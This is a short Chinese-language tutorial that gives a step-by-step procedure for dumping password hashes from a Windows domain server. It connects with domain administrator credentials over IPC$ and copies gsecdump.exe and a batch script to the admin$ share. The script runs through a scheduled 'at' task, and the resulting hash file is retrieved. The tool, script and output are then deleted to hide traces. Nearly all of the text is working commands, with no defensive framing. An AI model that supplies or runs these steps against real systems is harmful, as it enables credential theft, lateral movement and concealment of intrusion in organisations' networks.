使用at命令+gsecdump在域环境下抓Hash

使用域管理员帐号ipc到某台服务器

net use \\IP地址\ipc$ "密码" /user:"域管理员@当前域名称"

 

将本机的gsecdump.exe拷贝至对方的C:\WINDOWS目录下

copy gsecdump.exe \\IP地址\admin$

 

将本机的run.bat拷贝至对方的C:\WINDOWS目录下

copy run.bat \\IP地址\admin$

run.bat内容如下: C:\WINDOWS\gsecdump.exe -u -s>C:\WINDOWS\Hash.txt

 

查看目标服务器当前时间

net time \\IP地址

 

添加计划任务

at \\IP地址 xx:xx “run.bat”

 

设定时间过后查看Hash.txt文件是否成功生成

dir \\IP地址\admin$\Hash.txt

 

本机使用批处理文件获取Hash内容 fetch.bat

    fetch.bat内容如下:

type \\IP地址\admin$\Hash.txt>Domain_Hash.txt

 

删除目标服务器C:\WINDOWS目录下的gsecdump.exe

del \\IP地址\admin$\gsecdump.exe

 

删除目标服务器C:\WINDOWS目录下的run.bat

del \\IP地址\admin$\run.bat

 

删除目标服务器C:\WINDOWS目录下的Hash.txt

del \\IP地址\admin$\Hash.txt